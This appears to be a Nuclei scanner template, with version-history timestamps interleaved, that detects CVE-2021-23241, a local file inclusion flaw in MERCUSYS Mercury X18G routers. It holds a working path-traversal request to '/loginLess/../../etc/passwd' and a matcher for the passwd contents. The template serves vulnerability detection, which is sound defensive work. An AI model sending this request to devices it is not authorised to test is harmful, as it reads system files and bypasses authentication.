2021-07-20 08:52:10 +00:00
id : CVE-2021-23241
info :
2022-07-26 13:45:11 +00:00
name : MERCUSYS Mercury X18G 1.0.5 Router - Local File Inclusion
2021-07-20 08:52:10 +00:00
author : daffainfo
severity : medium
2022-07-26 13:45:11 +00:00
description : MERCUSYS Mercury X18G 1.0.5 devices are vulnerable to local file inclusion via ../ in conjunction with a loginLess or login.htm URI (for authentication bypass) to the web server, as demonstrated by the /loginLess/../../etc/passwd URI.
2021-08-18 11:37:49 +00:00
reference :
2021-07-20 08:55:37 +00:00
- https://github.com/BATTZION/MY_REQUEST/blob/master/Mercury%20Router%20Web%20Server%20Directory%20Traversal.md
2022-05-17 09:18:12 +00:00
- https://www.mercusys.com/en/
- https://www.mercurycom.com.cn/product-521-1.html
2022-07-26 13:45:11 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-23241
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 5.3
2021-09-10 11:26:40 +00:00
cve-id : CVE-2021-23241
cwe-id : CWE-22
2023-04-12 10:55:48 +00:00
epss-score : 0.00265
2022-04-22 10:38:41 +00:00
tags : cve,cve2021,iot,lfi,router
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2021-07-20 08:52:10 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-07-20 08:52:10 +00:00
- method : GET
path :
- "{{BaseURL}}/loginLess/../../etc/passwd"
matchers-condition : and
matchers :
- type : regex
regex :
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
2021-07-20 08:52:10 +00:00
part : body
2021-07-20 10:30:00 +00:00
2021-07-20 08:52:10 +00:00
- type : status
status :
- 200
2022-07-26 13:45:11 +00:00
# Enhanced by mp on 2022/07/22